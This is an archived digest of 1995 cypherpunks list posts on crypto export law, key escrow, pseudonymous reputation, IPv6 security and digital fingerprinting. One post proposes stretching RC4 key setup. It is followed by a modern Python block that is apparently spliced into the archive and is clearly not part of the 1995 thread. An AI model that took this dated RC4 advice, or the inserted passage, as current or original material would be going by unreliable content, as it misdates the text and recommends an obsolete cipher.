From: rsalz at osf.org (Rich Salz)
Date: Sun, 10 Sep 95 16:04:04 PDT
Subject: not a flame please read and think about this
Message-ID: <9509102303.AA13613@sulphur.osf.org>

> I was kind of wondering if it would be necessary to patent something
> just to ensure someone else did patent *your* idea, if you came up
> with one.

Nope.
> Or can you publish, and then say that's prior art, so no one else can
> go patent your idea.

This works. IBM used to publish a monthly journal (I forget the name, it came out of one of their Yorktown labs) that did exactly this kind of thing for exactly this kind of reason. Actually, they wrote about stuff that they thought was 5-10 years away.

>> even phil zimmerman is selling the rights to pgp. what about all the
>> people who contributed code (like me) ... . ask phil
>> about me and when i asked about sharing profits from the code i
>> contributed. also about the deal with r.f...

Mr/Ms. Anonymous is lying. His/her name appears nowhere in the credits, and his/her code appears nowhere in any PGP release. Don't waste any neurons on it.

/r$

From adam at bwh.harvard.edu Sun Sep 10 16:10:30 1995
From: adam at bwh.harvard.edu (Adam Shostack)
Date: Sun, 10 Sep 95 16:10:30 PDT
Subject: question about reputation
In-Reply-To:
Message-ID: <199509102310.TAA00342@bwh.harvard.edu>

Good question, but a quick modification allows for effective bootstrapping. If I want to start consulting for Amalgameted Consolodated, I can offer them a 10 free questions deal to bootstrap things with. Mallet can only cheat if my offer was broadcast. (I presume that Amalgameted's keys are somehow strongly verified, and the negotiations are kept secret from Eve and Mallet.)

There might also be fingerprinting technologies that allow me to embed a signature in the documents returned to clients that would allow me to show that Mallet stole them. (Which might, incidentally, get Mallet a job in some circles... If that's known, Bob and Alice can collude to make it appear that Bob was Mallet, and thus forge a reputation.

Wei wrote:

| In an economy based on positive reputations, how does one acquire a
| reputation capital? One way may be to initially perform services at a
| price below cost, but this has some problems.
|
| For example, Alice starts a anonymous consulting service, and announces
| that she will answer the first ten queries for free. Upon hearing this,
| Mallet immediately starts another consulting service, and announces the
| same offer. At this point Mallet can simply forward his customers'
| queries to Alice and Alice's answers back to his customers. Thus, he gains
| reputation at no cost.
|
| On the other hand, this "man-in-the-middle" attack can also work against
| conventional True Name based services, but perhaps with less effect. Has
| anyone ever heard of this being done?
|
| Is there a better way to acquire a good reputation?
|
| Wei Dai
|

--
"It is seldom that liberty of any kind is lost all at once." -Hume

From dneal at usis.com Sun Sep 10 16:47:01 1995
From: dneal at usis.com (David Neal)
Date: Sun, 10 Sep 95 16:47:01 PDT
Subject: Senate Bill 974?
Message-ID:

Haven't seen it discussed here, but the August 28, 1995 issue of Lan Times covers Sen. Charles Grassley's (R-IOWA) Senate Bill 974. Frankly, you should probably read the text of the bill itself, because the article doesn't seem to get the facts straight.

The article asserts first that the bill may outlaw any non-GAK encryption, but then quotes the senator as saying ``All my bill does is say you can't use computers to steal, to threaten others or conceal criminal conduct.'' Perhaps concealing criminal conduct is considered using non-GAK.

The quote from the bill itself reads like the ITAR; it is illegal to ``distribute computer software that encodes or encrypts electronic or digital communications to computer networks that the person knows, or reasonably should know, is accessible to foreign nationals and foreign governments, regardless of whether such software has been designated as nonexportable."

The article also says that up to 64 bit keys may now be allowed in exportable software, but that ``some experts'' suggest that those keys may have to be GAK.
I've never heard anything BUT the keys would have to GAK.

David Neal - GNU Planet Aerospace 1-800-PLN-8-GNU
Unix, Sybase and Networking consultant.
"...you have a personal responsibility to be pro-active in the defense of your own civil liberties." - S. McCandlish

From johnl at radix.net Sun Sep 10 17:06:34 1995
From: johnl at radix.net (John A. Limpert)
Date: Sun, 10 Sep 95 17:06:34 PDT
Subject: 64 bit crypto
Message-ID: <01BA7FB7.8CF32E40@dialin36.annex1.radix.net>

Couldn't we modify RC4 easily to provide the same security against brute-force attacks by just running the key-setup phase 65536 times instead of just once?

Why would the attacker need to run the key setup 65536 times?

From jya at pipeline.com Sun Sep 10 17:10:11 1995
From: jya at pipeline.com (John Young)
Date: Sun, 10 Sep 95 17:10:11 PDT
Subject: IP6_pi2
Message-ID: <199509110010.UAA29842@pipe2.nyc.pipeline.com>

IEEE Spectrum, September, 1995:

Excerpt on Net security from "Upgrading the Internet," a roundtable discussion of the Internet Society on the next generation of Internet protocols, IP Version 6.

Discussants: Vinton Cerf, Stephen Deering, Christian Huitema, Haruhisa Ishida, Larry Landweber, Eric Schmidt, Lixia Zhang.

A most important aspect of the IPv6 is the somewhat controversial decision to require that all v6 implementations support strong privacy and strong authentication. At this level, all of the security problems won't be solved, but we can authenticate and maintain privacy of packets that flow from one machine to another. This will eliminate many security threats in the current Internet, such as source-address-spoofing, source-related routing attacks, password sniffing, connection hijacking, and so on.

New Scientist, Sept 9, 1995:

"Watching you, watching us."

Companies that sell electronic surveillance equipment to repressive regimes face the prospect of being "outed" on the Internet this autumn.
Two electronic watchdogs, the British group Privacy International (PI) and its American sister organisation the Electronic Privacy Information Centre (EPIC), are setting up an offshore Internet site that will name companies that sell electronic instruments of repression to governments with poor records on human rights.

IPI-pair: IP6_pi2 (13kb)

From weidai at eskimo.com Sun Sep 10 17:20:39 1995
From: weidai at eskimo.com (Wei Dai)
Date: Sun, 10 Sep 95 17:20:39 PDT
Subject: question about reputation
In-Reply-To: <199509102310.TAA00342@bwh.harvard.edu>
Message-ID:

On Sun, 10 Sep 1995, Adam Shostack wrote:

> Good question, but a quick modification allows for effective
> bootstrapping. If I want to start consulting for Amalgameted
> Consolodated, I can offer them a 10 free questions deal to bootstrap
> things with. Mallet can only cheat if my offer was broadcast. (I
> presume that Amalagated' keys are somehow strongly verified, and the
> negotiantions are kept secret from Eve and Mallet.)

This scheme doesn't quite work. (Let's call Amalgameted Bob, to keep names short.) Bob can create a new, unlinkable pseudonym and give the same offer to Carol under the new pseudonym. Then, Bob acts as Mallet and passes messages back and forth between Alice and Carol. At the end of the 10 free questions, Bob terminates its contract with Alice, leaving Alice with nothing and Bob's pseudonym a certain amount of reputation with Carol.

> There might also be fingerprinting technologies that allow me
> to embed a signature in the documents returned to clients that would
> allow me to show that Mallet stole them. (Which might, incidentally,
> get Mallet a job in some circles...If thats known, Bob and Alice can
> collude to make it appear that Bob was Mallet, and thus forge a
> reputation.

Fingerprinting may be useful in some situations, but is clearly not a perfect solution to this problem.
Alice may be able to prove to Mallet's customers that she originally wrote the answers, but if their communications with Mallet are private, how does Alice even know who those customers are? Also, I'm not too familiar with fingerprinting technologies, but Mallet may be able to remove the identifying marks by translating the answers to a different form while preserving the meaning.

Wei Dai

From warnold at ptialaska.net Sun Sep 10 17:22:38 1995
From: warnold at ptialaska.net (William Arnold)
Date: Sun, 10 Sep 95 17:22:38 PDT
Subject: Wearing RSA shirt to school
In-Reply-To: <199509041203.IAA38469@tequesta.gate.net>
Message-ID: <42lvht$2br@news.dgsys.com>

I'm sorry. I got into this thread late. Where can I get a "munitions" t-shirt? If anyone knows, please e-mail me with the info. I'll wear it to work. (I do telephones for a paycheck, and often work in "government" offices.)

Thank you very much for the info.

From dneal at usis.com Sun Sep 10 17:25:06 1995
From: dneal at usis.com (David Neal)
Date: Sun, 10 Sep 95 17:25:06 PDT
Subject: Senate Bill 974
Message-ID:

Senate Bill 974

The full text is difficult to interpret since it mostly just amends other law. Essentially the law makes illegal: using a computer for racketeering purposes, threatening to destroy data, transferring of unlicensed software, using any method to hide illegal funds transfer, and exporting crypto software. (Relevant bits are included below). The law also expands wiretapping authority, and seems to allow electronic evidence found during a search to be introduced as evidence. You'll have to insert the text of the bill into the real laws to get full context.
`(2) to distribute computer software that encodes or encrypts electronic or digital communications to computer networks that the person distributing the software knows or reasonably should know, is accessible to foreign nationals and foreign governments, regardless of whether such software has been designated as nonexportable; `(3) to use a computer or computer network to transmit a communication intended to conceal or hide the origin of money or other assets, tangible or intangible, that were derived from racketeering activity; and `(4) to operate a computer or computer network primarily to facilitate racketeering activity or primarily to engage in conduct prohibited by Federal or State law. `(b) For purposes of this section, each act of distributing software is considered a separate predicate act. Each instance in which nonexportable software is accessed by a foreign government, an agent of a foreign government, a foreign national, or an agent of a foreign national, shall be considered as a separate predicate `(c) It shall be an affirmative defense to prosecution under this section that the software at issue used a universal decoding device or program that was provided to the Department of Justice prior to the distribution.'. David Neal - GNU Planet Aerospace 1-800-PLN-8-GNU Unix, Sybase and Networking consultant. "...you have a personal responsibility to be pro-active in the defense of your own civil liberties." - S. McCandlish From futplex at pseudonym.com Sun Sep 10 17:58:13 1995 From: futplex at pseudonym.com (Futplex) Date: Sun, 10 Sep 95 17:58:13 PDT Subject: Senate Bill 974? In-Reply-To: Message-ID: <9509110058.AA24206@cs.umass.edu> David Neal writes: > Haven't seen it discussed here, but the August 28, 1995 issue of Lan > Times covers Sen. Charles Grassley's (R-IOWA) Senate Bill 974. Actually, we considered S.974 (the Anti-Electronic Racketeering Act of 1995) here in excruciating detail a couple of months ago. Check the archives from e.g. July. 
At last report, the bill had been referred to committee. If/when it ever emerges from subcommittee, there's cause for concern. No mention of it has been made in the Congressional Record since Sen. Jon Kyl of Arizona joined as a cosponsor in late July. It doesn't currently appear on the unofficial list of "hot bills" on Thomas -- "bills that have received or are receiving floor action and/or debate in the United States Congress" (http://thomas.loc.gov/home/hot-bill.html) Hopefully it has died in committee, as more pressing matters have taken precedence. -Futplex From perry at piermont.com Sun Sep 10 17:59:31 1995 From: perry at piermont.com (Perry E. Metzger) Date: Sun, 10 Sep 95 17:59:31 PDT Subject: IP6_pi2 In-Reply-To: <199509110010.UAA29842@pipe2.nyc.pipeline.com> Message-ID: <199509110059.UAA11623@frankenstein.piermont.com> This was a very controversial move that Jeff Schiller had the foresight to drive through. There are still arguments about it, but overall it was a "good thing". .pm John Young writes: > Excerpt on Net security from "Upgrading the Internet," a > roundtable discussion of the Internet Society on the next > generation of Internet protocols, IP Version 6. > > Discussants: Vinton Cerf, Stephen Deering, Christian > Huitema, Haruhisa Ishida, Larry Landweber, Eric Schmidt, > Lixia Zhang. > > A most important aspect of the IPv6 is the somewhat > controversial decision to require that all v6 > implementations support strong privacy and strong > authentication. At this level, all of the security > problems won't be solved, but we can authenticate and > maintain privacy of packets that flow from one machine > to another. This will eliminate many security threats in > the current Internet, such as source-address-spoofing, > source-related routing attacks, password sniffing, > connection hijacking, and so on. 
From trost at cloud.rain.com Sun Sep 10 18:14:07 1995
From: trost at cloud.rain.com (Bill Trost)
Date: Sun, 10 Sep 95 18:14:07 PDT
Subject: NIS&T Key Escrow Export kangaroo conference
Message-ID:

Pat Farrell's summary of the NIS&T conference (thanks for the report, by the way!) discussed a bunch of "criteria" that an "acceptable" GAK system should provide, including a couple that are supposed to limit the ability of law enforcement to use keys beyond the bounds of the search warrant.

Another criterion that needs to be brought up (although I'm not sure of how one would phrase it in a way that is either clean or polite) comes out of a debate between Philip Zimmermann and Dorothy Denning I ran across at one point: "How can a GAK system be arranged so that some future Congress cannot destroy the protections of the split-"escrow" system by issuing a resolution like 'All key components of suspected Comm^H^H^H^H terrorists shall be provided to the House Committee on Unamerican Activities'?"

The links to McCarthyism are important here. GAK proponents can't claim this kind of thing won't happen -- it *has* happened, and could easily happen again. Anyone who claims otherwise is either terribly naive or is being outright misleading.

In some sense, this criterion goes to the very heart of the whole GAK question -- even if you believe in the allegedly legitimate power of law enforcement to look through people's love letters, the "safety mechanisms" for the keys are nothing more than a set of flimsy policies that Congress could toss aside the next time something scary comes along. The protections that the GAK proponents are proposing (and proponing (-: ) are frightfully ephemeral.

By the way, I'm a few days behind, so sorry if this is "old mail".
From futplex at pseudonym.com Sun Sep 10 18:55:45 1995 From: futplex at pseudonym.com (Futplex) Date: Sun, 10 Sep 95 18:55:45 PDT Subject: question about reputation In-Reply-To: Message-ID: <9509110155.AA25082@cs.umass.edu> Wei Dai writes: > On the other hand, this "man-in-the-middle" attack can also work against > conventional True Name based services, but perhaps with less effect. Has > anyone ever heard of this being done? Undoubtedly -- this is a factor in the abundance of "no sales to dealers" and "limit N per customer" in sales advertisements. -Futplex From cman at communities.com Sun Sep 10 18:57:48 1995 From: cman at communities.com (Douglas Barnes) Date: Sun, 10 Sep 95 18:57:48 PDT Subject: Digital Fingerprinting Message-ID: A couple of threads have recently touched on aspects of "digital fingerprinting", a term that covers a variety of methods for making changes to digital documents in order to trace the origin of illicit copies. This subject has been on my mind after several discussions on this topic at Crypto, as well as the one formal presentation on the subject. Here are some of my thoughts on this subject: o If the domain of changes is well understood, and can be altered without significant loss of quality, then it is trivially easy to remove the fingerprinting. In other words, if you know the algorithm used to create the fundamental codewords in the fingerprint, and you can overwrite arbitrary codeword bits with other codeword bits, then the scheme can be avoided without collaboration of any kind. Example: A software company fingerprints its software by mapping two equivalent machine instructions onto binary "0" and "1", respectively. Someone who knows about this could randomly replace one instruction with the equivalent one, which would reduce the fingerprint to noise. Example: A publishing company uses an even number of points between paragraphs to indicate "0" and an odd number of points to indicate "1". 
Someone who understands this can overwrite the fingerprint as above.

o If a fingerprinting scheme depends on the secrecy of an algorithm, then this is really "security by obscurity", which may be effective for a period of time, but is likely to meet the fate of most copy protection schemes that have rested on raw obscurity.

o Certain domains of information lend themselves to the secure formation of fingerprint "bits" that are very difficult to scrub in this way. One such scheme was used as the basis for the presentation at Crypto: imagine that a film was shot with two (or N) cameras. For each frame of the film, the distributor can choose to take a frame from a different camera. Frames from camera 0 would be mapped onto binary "0", frames from camera 1 would be mapped onto binary "1". Using this approach it is possible to construct schemes that are resistant to collaboration up to "N" people. The security of such schemes rests on the assumption that given one frame, it is very hard (and possibly intractable) to fuzz up the frame such that the parallax information doesn't give away which camera shot the frame. Rather than hiding the fingerprint information in the "low bits", this technique hides the information throughout the picture. In one sense, a 2D picture of a 3D object is similar to a one-way hash function. It is a form of lossy compression on the 3D object that is impractical to work backwards.

o Note that overwriting a fingerprint with random noise (or whatever) does not generate a valid replacement fingerprint. Therefore it would still be possible to tell that a document had been tampered with (and was not a valid copy), even if its provenance could not be determined.

o A number of people are working on "black box" viewer technology, which would allow people to purchase documents that could only be read on devices with tamper-resistant hardware in them that would be required to decrypt media.
Certainly much piracy could be done by capturing the output of such a box (unless it was embedded in a tamper-resistant chassis); there are some proposed schemes for reducing the payoff of output capture, but they depend on a similar approach to the movie fingerprinting idea above -- the base data format is somehow richer, possibly capable of generating different output under different circumstances or on different hardware platforms, while the output of the black box represents only one view of the base data. Example: a base format for a 3D object is encrypted with a public key resident in the "black box". Said black box also includes a hardware 3D rendering engine. The output of the black box consists of a series of 2D frames, which may make it impractical to reproduce the base 3D object. It is my considered opinion that this sort of technology will meet with tremendous customer resistance, and will not prove practical or cost-effective; many analysts are predicting a trend toward more general purpose computers for media viewing rather than towards specialized hardware that is needed for this kind of approach.

o There are also some profound practical and legal problems with the use of digital fingerprinting. For one thing, it involves generating a unique copy of every document for each consumer. After the digital fingerprinting session at Crypto, a guy from Microsoft was pointing out the incredible difficulties posed by trying to fingerprint, say, every copy of Windows 95. On the legal front, it's not clear what you can do to someone even if you _can_ prove that the 100,000 pirate copies of Windows 95 circulating in Amsterdam stemmed from his copy.
Machines get hacked, co-workers and family members often have free access to machines running software -- it's not clear that media companies _want_ to invoke the paranoia associated with potential responsibility for millions of dollars in damages if someone makes an illegal copy of one's software and the loaves and fishes ensue. [Imagine what great revenge this would make for jealous co-workers, ex-wives, etc.]

From thad at hammerhead.com Sun Sep 10 19:02:06 1995
From: thad at hammerhead.com (Thaddeus J. Beier)
Date: Sun, 10 Sep 95 19:02:06 PDT
Subject: 64 bit crypto
Message-ID: <199509110157.SAA01073@hammerhead.com>

John A. Limpert says:
> Why would the attacker need to run the key setup 65536 times?

I could have been more clear. Forgive a little bit of code... Here is the beginning of the alleged RC4:

    /* start from the identity permutation */
    for(counter = 0; counter < 256; counter++)
        state[counter] = counter;
    index2 = 0;
    key->x = key->y = index1 = index2 = 0;
    /* one pass of 256 key-dependent swaps */
    for(counter = 0; counter < 256; counter++) {
        index2 = (key_data_ptr[index1] + state[counter] + index2) % 256;
        swap_byte(&state[counter], &state[index2]);
        index1 = (index1 + 1) % key_data_len;
    }

If it was changed to

    for(counter = 0; counter < 256; counter++)
        state[counter] = counter;
    key->x = key->y = index1 = index2 = 0;
    for(i = 0; i < 65536; i++) {  /* stir the pot a long time */
        for(counter = 0; counter < 256; counter++) {
            index2 = (key_data_ptr[index1] + state[counter] + index2) % 256;
            swap_byte(&state[counter], &state[index2]);
            index1 = (index1 + 1) % key_data_len;
        }
    }

Then the prepare_key routine would take much much longer. The idea is that a 64 bit crypto routine can be arbitrarily secure against brute-forcing, if you are willing to pay a runtime penalty every time you use it.
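The key-setup stretching described in the post above, as an added example that is not part of the original message or of the original RC4 listing: a Python rendering of the RC4 key schedule with a repeat count. `rounds=1` is the textbook KSA and is checked against the widely published RC4 test vectors ("Key"/"Plaintext", "Wiki"/"pedia", "Secret"/"Attack at dawn"); a larger count repeats the 256-swap pass without resetting index1 or index2, exactly as the modified outer loop does. The function names and the `ROUNDS` constant are this example's own. The point a practitioner should take from it is in `brute_force_passes`: repeating the setup multiplies the cost of every candidate key by the repeat count, so 65536 passes add about 16 bits of work factor to a 64-bit key (2^80 passes to exhaust), but the legitimate user pays the same factor on every key setup, and no entropy is added. RC4 itself is obsolete (RFC 7465 prohibits it in TLS), so this illustrates the general key-stretching idea rather than a cipher to deploy.

```python
# Added example, not code from the post or from the original RC4 listing.
# RC4 key schedule with a repeat count, so the cost of "stirring the pot"
# can be seen and measured.  Names below are this example's own.
import time

ROUNDS = 65536          # the post's proposed repeat count; 1 = standard RC4


def rc4_ksa(key: bytes, rounds: int = 1) -> list:
    """Key-scheduling algorithm (KSA).

    rounds == 1 is the textbook KSA: one pass of 256 key-dependent swaps.
    rounds > 1 repeats that pass without resetting the key index (index1)
    or the swap index (index2), exactly as the post's outer loop does.
    """
    if not key:
        raise ValueError("RC4 key must be non-empty")
    if rounds < 1:
        raise ValueError("rounds must be at least 1")
    state = list(range(256))                  # identity permutation
    index1 = 0                                # position in the key
    index2 = 0                                # swap target
    for _ in range(rounds):
        for counter in range(256):
            index2 = (key[index1] + state[counter] + index2) % 256
            state[counter], state[index2] = state[index2], state[counter]
            index1 = (index1 + 1) % len(key)
    return state


def rc4_keystream(state: list, n: int) -> bytes:
    """Pseudo-random generation algorithm (PRGA): n keystream bytes."""
    s = state[:]                              # leave the caller's state intact
    x = y = 0
    out = bytearray()
    for _ in range(n):
        x = (x + 1) % 256
        y = (y + s[x]) % 256
        s[x], s[y] = s[y], s[x]
        out.append(s[(s[x] + s[y]) % 256])
    return bytes(out)


def rc4_crypt(key: bytes, data: bytes, rounds: int = 1) -> bytes:
    """Encrypt or decrypt (same operation) with an optionally stretched KSA."""
    ks = rc4_keystream(rc4_ksa(key, rounds), len(data))
    return bytes(a ^ b for a, b in zip(data, ks))


def brute_force_passes(key_bits: int, rounds: int) -> int:
    """Worst-case number of 256-swap KSA passes an exhaustive key search runs:
    every key is tried, and each trial costs `rounds` passes.  The repeat
    count is a constant work factor (log2(rounds) extra bits of effort),
    not extra key entropy."""
    return rounds * (1 << key_bits)


def ksa_seconds(key: bytes, rounds: int) -> float:
    """Wall-clock cost of one key setup: the penalty the legitimate user pays
    on every setup, and the attacker pays once per candidate key."""
    start = time.perf_counter()
    rc4_ksa(key, rounds)
    return time.perf_counter() - start


if __name__ == "__main__":
    key = b"Key"                              # widely published RC4 test key
    print("standard keystream: ", rc4_keystream(rc4_ksa(key), 8).hex())
    print("stretched keystream:", rc4_keystream(rc4_ksa(key, ROUNDS), 8).hex())
    for r in (1, ROUNDS):
        passes = brute_force_passes(64, r)
        print(f"64-bit key, {r:>5} round(s): 2^{passes.bit_length() - 1} KSA "
              f"passes to exhaust, {ksa_seconds(key, r):.3f}s per key setup here")
```

Running the demo with `ROUNDS = 65536` takes several seconds per key setup in CPython; that delay is the whole point of the scheme, and the same delay is what an attacker would pay per guess.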
thad -- Thaddeus Beier email: thad at hammerhead.com Technology Development vox: 408) 286-3376 Hammerhead Productions fax: 408) 292-8624 From futplex at pseudonym.com Sun Sep 10 19:07:44 1995 From: futplex at pseudonym.com (Futplex) Date: Sun, 10 Sep 95 19:07:44 PDT Subject: question about reputation In-Reply-To: Message-ID: <9509110207.AA25237@cs.umass.edu> Adam Shostack writes: # Good question, but a quick modification allows for effective # bootstrapping. If I want to start consulting for Amalgameted # Consolodated, I can offer them a 10 free questions deal to bootstrap # things with. Mallet can only cheat if my offer was broadcast. Wei Dai writes: > This scheme doesn't quite work. (Let's call Amalgameted Bob, to keep > names short.) Bob can create a new, unlinkable pseudonym and give the same > offer to Carol under the new pseudonym. Then, Bob acts as Mallet and > passes messages back and forth between Alice and Carol. If all Alice's prospective customers are also resellers on the side, then I agree that she has a problem. But how realistic is a market scenario in which a new supplier cannot positively identify some legitimate end consumers of a product or service ? (I'm ignoring cases in which the market for the product or service is only just being forged.) This strikes me as rather implausible, although I don't claim to have devoted a great deal of thought to it. -Futplex From jpb at miamisci.org Sun Sep 10 19:26:36 1995 From: jpb at miamisci.org (Joe Block) Date: Sun, 10 Sep 95 19:26:36 PDT Subject: not a flame please read and think about this Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Rich said >>> even phil zimmerman is selling the rights to pgp. what about all the >>> people who contributed code (like me) ... . ask phil >>> about me and when i asked about sharing profits from the code i >>> conrtibuted. also about the deal with r.f... > >Mr/Ms. Anonymous is lying. 
His/her name appears nowhere in the credits, >and his/her code appears nowhere in any PGP release. Don't waste any >neurons on it. Let Anonymous have a share of prz's legal bills as well. No matter how much Phil is getting from licensing, somehow I doubt he is netting a profit... -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQEVAwUBMFOfeGGnwFiC3O2NAQHedwf/T9QOEUBdX7DZx1ygdk4/Us2wmiYQiDUG PZxht4G+66aYO/7IYwxIES9ksAvCP/vZJ14a55Lc+NJABFnMe/eJrbXmNSjyGdFP hoHUXGWv3BJDpx6QvhapDFoAsG0b0KgDQMpG2/6s9VPKsDoNNioUDzvpV4lh7fNh RhjO1yA1dYHVcW2ihICByw/e43aU35xhrDhzFm/9ExtVT2STMGvnTso3Pgj/oAqa Szbj2AzKp6NmI+BdfWrZmdFcFdji8toQ5AtUmBY1gBU1DbDZzdV8BiDYnMJfbcyH TIKxU4xPWpXi3WjfE37CsPnxGv+ASylHuCUpanldKaz3y03hRawIBQ== =3Pw7 -----END PGP SIGNATURE----- From hfinney at shell.portal.com Sun Sep 10 19:31:44 1995 From: hfinney at shell.portal.com (Hal) Date: Sun, 10 Sep 95 19:31:44 PDT Subject: Digital Fingerprinting Message-ID: <199509110229.TAA11621@jobe.shell.portal.com> I'm not sure how to do it for software, but for novels it should be easy to fingerprint. Every couple of pages the author writes a sentence twice in different forms. This would not take a great deal of extra effort on the part of the author. Software can then choose from the alternative variations in different patterns to produce a unique fingerprint for every copy. There would seem to be two approaches to removing the fingerprint. One would be re-writing every sentence in the novel. The other would be to collect enough copies to identify all of the sentences which have variations. Most of the mathematics of fingerprinting research is oriented around figuring out how many different points of variation there must be to be secure against a certain number of copies of the fingerprinted item being compared. Perhaps a similar approach could be applied to software, where in many cases a couple of statements could be trivially interchanged, or other kinds of simple transformations could be manually generated. 
Those could be marked by the programmers without too much extra work. I agree with Doug that fully automated fingerprinting schemes which post process "vanilla" documents are going to be forced to rely on security through obscurity, probably a losing battle. Also as Doug says the viability of legal sanctions against the source of fingerprinted docs is questionable. Maybe it could work if you had just a few copies out and the people who were given copies can be seriously held to non-disclosure agreements.

Hal

From nobody at REPLAY.COM Sun Sep 10 20:23:55 1995
From: nobody at REPLAY.COM (Anonymous)
Date: Sun, 10 Sep 95 20:23:55 PDT
Subject: Security Policy Documents
Message-ID: <199509110323.FAA01214@utopia.hacktic.nl>

From: URL: http://csrc.ncsl.nist.gov/secplcy/

Computer Security Resource Clearinghouse WWW Server
_________________________________________________________________

SECURITY POLICY DOCUMENTS

These are computer security policy documents, primarily from the Department of Commerce, and the Office of Management and Budget.

a130app3.txt [62983 bytes] 1995-03-29 Proposed Revision of OMB Circular No. A-130 Appendix III
doj-fg.zip [172668 bytes] 1994-07-04 "Searching and Seizing Computers," U.S. Dept. of Justice, Federal Guidelines, July 1994 (zipped WordPerfect file)
omba130.txt [80748 bytes] 1994-06-06 Office Management and Budget
cryptpol.wp [68689 bytes] 1994-03-01 Cryptography: Policy and Technology Trends
doc-copy.txt [4600 bytes] 1993-11-23 Department of Commerce's Software Copyright Policy
doc-poli.txt [86434 bytes] 1993-11-23 Department of Commerce's Chapter 10 of the DOC IT Management Handbook, which contains the IT Security policies for the Dept.
doc-man.txt [253689 bytes] 1993-11-19 Department of Commerce beginning sections of the DOC "Information Technology Security Manual"
a130.zip [26986 bytes] 1992-06-08 Proposed Revision to OMB Circular A-130
sec_2315.txt [2150 bytes] 1992-02-27 Sect. 2315 of U.S.
Code Title 10
omb_a130.txt [97630 bytes] 1992-02-27 OMB Circular A-130, "Management of Federal Information Resources"
opm_plcy.txt [12951 bytes] 1992-02-27 Computer Security Training Policy
csa_87.txt [153493 bytes] 1992-02-27 Computer Security Act of 1987
rfc1244.txt [253471 bytes] 1991-11-08 Very good summary of site security policies

From tcmay at got.net Sun Sep 10 20:26:09 1995
From: tcmay at got.net (Timothy C. May)
Date: Sun, 10 Sep 95 20:26:09 PDT
Subject: Digital Fingerprinting
Message-ID:

Many interesting points here...but I'll stick to just one:

At 2:56 AM 9/11/95, Douglas Barnes wrote:

> On the legal front, it's not clear what you can do to someone
> even if you _can_ prove that the 100,000 pirate copies of Windows
> 95 circulating in Amsterdam stemmed from his copy. Machines get
> hacked, co-workers and family members often have free access to
> machines running software -- it's not clear that media companies
> _want_ to invoke the paranoia associated with potential responsibility
> for millions of dollars in damages if someone makes an illegal copy
> of one's software and the loaves and fishes ensue. [Imagine what
> great revenge this would make for jealous co-workers, ex-wives, etc.]

If a piece of mail addressed to me is found littering the highway, can I be convicted of littering? No, because the _provenance_ of that item of mail cannot be determined...it might have accidentally blown out of a trash truck delivering my mail to the dump, for example.

Ditto for most schemes to serialize software. As Doug notes, the offending item might have been copied when I wasn't looking, copied by my girlfriend when I was away, or even copied at the factory or at the software store prior to my gaining control. Or copied after I discarded it. (Requiring owners of Microsoft Word to treat it like a state secret--more on state secrets in a minute--is impractical and unenforceable.)
One thing serialization could do is to allow proof that a distributor had not acquired a particular copy/instance through normal channels. But it's usually obvious anyway when Joe's Really Cheap Warez has 200 copies of Microsoft Word, all with the same serial number. The "light signatures" scheme I've written about here could be used to authenticate the distribution media itself, though not the installed copies of course. (This would be like the Microsoft hologram, except in spades.) Since the technology for this is not available to home or business users, I don't see this as a viable approach. Another thing that could work to foil mass counterfeiters is to serialize the diskettes and include a hash of the serial number, as some lottery tickets now include. Counterfeiters could try two basic approaches: 1. Make up their own numbers. But they could not compute a valid hash, as they lacked the (presumably secret) knowledge to do so. With public key approaches, a customer could "authenticate" that at least Microsoft, say, must have generated the number. (This doesn't take care of multiple copies of the same serial number, which takes us to:) 2. Multiple copies of a single, valid serial number. Here, the counterfeiter directly copies both the serial number and its hash. (This approach doesn't work to counterfeit lottery tickets. The reason is left as an exercise for the reader.) One way I can think of to head this off is to have a registry of "taken" or "sold" numbers, in which serial numbers are deposited. A purchaser could consult this data base to see if the number on the package he is planning to buy is already registered. (There are complications about time delays, and so forth, but this would eventually limit multiple same number packages.) This discussion assumes that purchasers are interested in getting valid, non-counterfeit programs. Many are not, of course. Certain types of programs pretty much require support by the vendor, others don't. 
A standard discussion topic. I said I'd mention "state secrets" again. The usual example for making subtle modifications to documents to see who leaked it is the intelligence community, which gave us the term "barium" (because the changes look like barium in an x-ray diagnostic). In that case, the agencies can enforce their laws in a draconian way, sometimes merely by suspicion. And the workarounds we discuss, of DIFFing the files, are unlikely to be practical. ("Hey, Sid, can I borrow your copy of "Covert Operations in Bosnia" so I can DIFF it with my copy?") --Tim May ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From ponder at wane-leon-mail.scri.fsu.edu Sun Sep 10 20:43:52 1995 From: ponder at wane-leon-mail.scri.fsu.edu (P.J. Ponder) Date: Sun, 10 Sep 95 20:43:52 PDT Subject: GAK/weak crypto rationale? Message-ID: After reviewing the reports filed by our intrepid reporters in the field about the NIST meetings, I am left with a puzzling thought: Why are the NSA and the FBI so very keen on GAK and weak crypto? There was posted on this list some time back a statistic about the number of wiretaps and intercepts requested and authorized in the past year. As I recall, the number was quite small - around 12K [?]. Someone had found this out through an FOIA request, perhaps, (my recollection of it is poor). It was not a large number, anyway. I must conclude that the actual number of intercepts is much, much larger than they are saying, and that they must be getting what they perceive to be good intel from all this snooping. 
Otherwise, why would the NSA and the FBI be so gung-ho on this, when everyone is telling them it is bad for US software business, abhorrent to privacy rights, unenforceable, and just plain bone-headed in these new international geodesic network times?

-- PJ

p.s. -thanks for the reports, well done. I think most of the list readers are very appreciative of the coverage provided on Crypto95 and NIST sham.

From don at cs.byu.edu Sun Sep 10 21:43:09 1995
From: don at cs.byu.edu (don at cs.byu.edu)
Date: Sun, 10 Sep 95 21:43:09 PDT
Subject: Document Fingerprinting
Message-ID: <199509110443.WAA00476@wero.byu.edu>

-----BEGIN PGP SIGNED MESSAGE-----

Will French:
> Sounds like a disaster to me, unless it can be done
>automatically, by a proven-correct program. I used to use
>commercial compilers that (at least claimed to) put their
>"stamp" on the assembly code they generated, so they could sue
>if you released a product without having a license for the
>compiler. Bugs are bad enough as it is; we don't need extra
>ones that only show up in some copies!

